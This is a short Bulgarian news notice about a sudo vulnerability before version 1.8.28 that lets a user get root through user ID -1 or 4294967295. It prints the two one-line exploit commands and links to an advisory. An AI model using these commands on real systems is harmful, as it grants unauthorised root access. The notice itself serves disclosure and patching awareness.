Уязвимост Π² sudo

Π“Ρ€Π΅ΡˆΠΊΠ° Π² sudo позволява всСки изпълним Ρ„Π°ΠΉΠ» Π΄Π° бъдС изпълнСн ΠΊΠ°Ρ‚ΠΎ root, Π°ΠΊΠΎ /etc/sudoers позволява Ρ‚ΠΎΠΉ Π΄Π° бъдС изпълнСн ΠΊΠ°Ρ‚ΠΎ Π΄Ρ€ΡƒΠ³ΠΈ ΠΏΠΎΡ‚Ρ€Π΅Π±ΠΈΡ‚Π΅Π»ΠΈ ΠΈ Π΅ Π·Π°Π±Ρ€Π°Π½Π΅Π½ Π·Π° root.

Π˜Π·ΠΏΠΎΠ»Π·Π²Π°Π½Π΅Ρ‚ΠΎ Π½Π° Π³Ρ€Π΅ΡˆΠΊΠ°Ρ‚Π° Π΅ ΠΌΠ½ΠΎΠ³ΠΎ просто:

sudo -u#-1 id -u

ΠΈΠ»ΠΈ:

sudo -u#4294967295 id -u

Π“Ρ€Π΅ΡˆΠΊΠ°Ρ‚Π° ΠΏΡ€ΠΈΡΡŠΡΡ‚Π²Π° във всички вСрсии Π½Π° sudo ΠΏΡ€Π΅Π΄ΠΈ 1.8.28

Π”Π΅Ρ‚Π°ΠΉΠ»ΠΈ:

https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html


https://www.sudo.ws/alerts/minus_1_uid.html

Π˜Π·Ρ‚ΠΎΡ‡Π½ΠΈΠΊ: linux.org.ru

ДобавянС Π½Π° Π½ΠΎΠ² ΠΊΠΎΠΌΠ΅Π½Ρ‚Π°Ρ€